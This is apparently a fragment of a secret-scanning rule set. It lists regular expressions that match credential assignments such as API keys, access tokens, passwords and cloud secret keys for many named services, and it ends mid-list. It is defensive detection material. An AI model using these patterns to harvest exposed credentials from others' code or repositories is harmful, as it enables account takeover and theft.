part: body - regex: - - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vscetoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?usertravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sshpass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 